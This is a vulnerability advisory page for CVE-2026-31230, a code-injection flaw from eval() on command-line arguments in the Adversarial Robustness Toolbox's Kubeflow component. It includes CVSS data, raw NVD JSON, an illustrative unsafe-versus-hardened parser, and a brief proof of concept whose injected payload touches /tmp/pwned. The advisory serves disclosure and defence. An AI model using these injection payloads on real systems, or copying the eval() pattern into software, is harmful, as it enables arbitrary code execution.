Security Vulnerability Report
CVE-2026-31230 CVSS 9.8 CRITICAL

CVE-2026-31230

Published: 2026-05-12 18:16:51
Last Modified: 2026-05-13 16:16:39

Description

The Adversarial Robustness Toolbox (ART) through 1.20.1 contains a command-line argument injection vulnerability in its Kubeflow component (robustness_evaluation_fgsm_pytorch.py). The script uses the unsafe eval() function to parse the string values supplied via the --clip_values and --input_shape command-line arguments, so an attacker who controls either argument can inject arbitrary Python code, which executes when eval() is called. The vulnerability can be exploited remotely where an attacker can control these arguments (e.g., through pipeline configuration or automated scripts), leading to arbitrary code execution on the system running the ART evaluation.
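The pattern the description refers to, and the fix a maintainer would apply, side by side. This is an added example and not code from the ART project: the eval() parser stands in for the vulnerable script's behaviour, the hardened parsers use ast.literal_eval plus explicit shape checks, and the function names, argparse layout and default values are assumptions made for this illustration.

```python
"""
Added example, not code from the ART project: the eval()-on-argument
pattern the advisory describes beside a hardened parser based on
ast.literal_eval plus shape validation. The function names, the argparse
layout and the defaults are assumptions made for this illustration.
"""
import argparse
import ast
from typing import Tuple


def parse_unsafe(value: str):
    """Vulnerable pattern: eval() on an attacker-controlled CLI string.

    Any expression is executed, so a value such as
    "__import__('os').system('id')" runs a command instead of yielding a tuple.
    """
    return eval(value)  # deliberately unsafe, shown for contrast only


def _literal(value: str):
    """Parse a Python literal only; calls, names and attribute access are rejected."""
    try:
        return ast.literal_eval(value)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError) as exc:
        raise argparse.ArgumentTypeError(f"not a plain literal: {value!r}") from exc


def _is_number(x) -> bool:
    # bool is a subclass of int; "(True, False)" is not a sensible clip range
    return isinstance(x, (int, float)) and not isinstance(x, bool)


def parse_clip_values(value: str) -> Tuple[float, float]:
    """Hardened: accept only "(min, max)" with numeric min < max."""
    parsed = _literal(value)
    if not isinstance(parsed, (tuple, list)) or len(parsed) != 2 or not all(map(_is_number, parsed)):
        raise argparse.ArgumentTypeError("clip_values must be a pair of numbers, e.g. (0.0, 1.0)")
    lo, hi = float(parsed[0]), float(parsed[1])
    if lo >= hi:
        raise argparse.ArgumentTypeError("clip_values minimum must be below maximum")
    return lo, hi


def parse_input_shape(value: str) -> Tuple[int, ...]:
    """Hardened: accept only a non-empty tuple/list of positive ints, e.g. (1, 28, 28)."""
    parsed = _literal(value)
    if (not isinstance(parsed, (tuple, list)) or not parsed
            or not all(isinstance(d, int) and not isinstance(d, bool) and d > 0 for d in parsed)):
        raise argparse.ArgumentTypeError("input_shape must be a tuple of positive integers")
    return tuple(parsed)


def hardened_rejects(value: str) -> bool:
    """True if both hardened parsers refuse the string (used to exercise the checks)."""
    for parser in (parse_clip_values, parse_input_shape):
        try:
            parser(value)
            return False
        except argparse.ArgumentTypeError:
            pass
    return True


def build_parser() -> argparse.ArgumentParser:
    """argparse wiring: validation happens at parse time, before any model code runs."""
    parser = argparse.ArgumentParser(description="hardened argument parsing (illustrative)")
    parser.add_argument("--clip_values", type=parse_clip_values, default="(0.0, 1.0)")
    parser.add_argument("--input_shape", type=parse_input_shape, default="(1, 28, 28)")
    return parser


if __name__ == "__main__":
    injected = "__import__('os').getcwd()"  # constructed payload: a call that eval() will execute
    print("eval() result:", parse_unsafe(injected))           # the call ran and returned a path
    print("hardened rejects it:", hardened_rejects(injected))  # True
    ns = build_parser().parse_args(["--clip_values", "(0, 255)", "--input_shape", "[3, 32, 32]"])
    print(ns.clip_values, ns.input_shape)                      # (0.0, 255.0) (3, 32, 32)
```

ast.literal_eval only builds constants, tuples, lists, dicts and sets, so the injected call raises ValueError before anything runs; the shape checks on top of it matter because a literal such as (1.0, 0.0) or (True, False) is still not a valid clip range or input shape and would otherwise fail later, deep inside the evaluation.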

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: this vector assumes the arguments are attacker-controlled, as in the pipeline-configuration scenario the description gives; where only trusted local operators can set them, the effective attack surface is narrower than the score suggests.

Configurations (Affected Products)

No NVD CPE configuration data is available; the affected range below is taken from the description.

Adversarial Robustness Toolbox (ART) <= 1.20.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-31230
# Exploit usage of eval() on --clip_values or --input_shape
import subprocess

# Malicious payload to execute arbitrary Python code
# Example: spawning a shell or writing a file
payload = "__import__('os').system('touch /tmp/pwned')"

# Construct the command to run the vulnerable script
command = [
    'python',
    'robustness_evaluation_fgsm_pytorch.py',
    '--clip_values', f"({payload})",  # Injecting code into the argument; eval() executes it
    '--input_shape', '(1, 28, 28)',
]

# Execution leads to RCE (left commented out; run only in an authorized test environment)
# subprocess.run(command)

References

https://github.com/Trusted-AI/adversarial-robustness-toolbox
https://www.notion.so/CVE-2026-31230-35d1e13931888126b624d12769c0e040

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31230", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:51.277", "lastModified": "2026-05-13T16:16:39.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Adversarial Robustness Toolbox (ART) thru 1.20.1 contains a command-line argument injection vulnerability in its Kubeflow component (robustness_evaluation_fgsm_pytorch.py). The script uses the unsafe eval() function to parse string values provided via the --clip_values and --input_shape command-line arguments. This allows an attacker to inject arbitrary Python code into these arguments, which will be executed when eval() is called. The vulnerability can be exploited remotely if an attacker can control these arguments (e.g., through pipeline configuration or automated scripts), leading to arbitrary code execution on the system running the ART evaluation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://github.com/Trusted-AI/adversarial-robustness-toolbox", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31230-35d1e13931888126b624d12769c0e040", "source": "[email protected]"}]}}